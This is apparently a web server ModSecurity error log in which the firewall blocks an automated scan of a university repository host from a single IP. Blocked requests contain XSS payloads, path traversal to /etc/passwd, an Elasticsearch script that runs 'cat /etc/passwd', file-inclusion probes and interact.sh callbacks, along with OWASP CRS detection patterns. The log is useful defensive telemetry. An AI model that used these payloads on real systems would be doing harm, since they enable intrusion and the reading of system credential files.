[Tue Aug 29 11:56:30.588107 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArHa3EAAAAJ"]
[Tue Aug 29 11:56:33.083673 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4c417fa93f05a6c1142d086a2b81f21f44682fb3"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/onlinePreview"] [unique_id "ZO16gMCo-f0AAArLLfoAAAAb"]
[Tue Aug 29 11:56:33.620546 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqsV@cAAAAB"]
[Tue Aug 29 11:56:34.608378 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAArHa4EAAAAJ"]
[Tue Aug 29 11:56:36.705215 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq-HcwAAAAT"]
[Tue Aug 29 11:56:36.715393 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqeFqwAAAAx"]
[Tue Aug 29 11:56:38.719062 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAoz8LwAAAAS"]
[Tue Aug 29 11:56:39.528518 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPxgAAAAC"]
[Tue Aug 29 11:56:39.799099 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArIAWUAAAAX"]
[Tue Aug 29 11:56:39.878960 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAAq-HeAAAAAT"]
[Tue Aug 29 11:56:40.868382 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArZPy8AAAAC"]
[Tue Aug 29 11:56:40.881380 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8McAAAAS"]
[Tue Aug 29 11:56:42.795839 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAocymcAAAAR"]
[Tue Aug 29 11:56:43.532992 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqsWAYAAAAB"]
[Tue Aug 29 11:56:43.718327 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArHa6EAAAAJ"]
[Tue Aug 29 11:56:44.634243 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArIAYUAAAAX"]
[Tue Aug 29 11:56:45.574624 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:856118/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAqw54sAAAAH"]
[Tue Aug 29 11:56:46.560813 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:379323/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq@sn0AAAAM"]
[Tue Aug 29 11:56:46.745667 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAq5@VsAAAAK"]
[Tue Aug 29 11:56:47.557489 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAoz8OQAAAAS"]
[Tue Aug 29 11:56:47.654395 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAArZP10AAAAC"]
[Tue Aug 29 11:56:48.567663 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqsWB4AAAAB"]
[Tue Aug 29 11:56:48.721131 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAq-Hg0AAAAT"]
[Tue Aug 29 11:56:50.688944 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAoz8PYAAAAS"]
[Tue Aug 29 11:56:51.731650 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "repositoryfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArZP3QAAAAC"]
[Tue Aug 29 11:56:52.667562 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAolK8YAAAAe"]
[Tue Aug 29 11:56:52.751028 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtmwAAAAA"]
[Tue Aug 29 11:56:54.642996 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAqqtoAAAAAA"]
[Tue Aug 29 11:56:56.093282 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArIAc4AAAAX"]
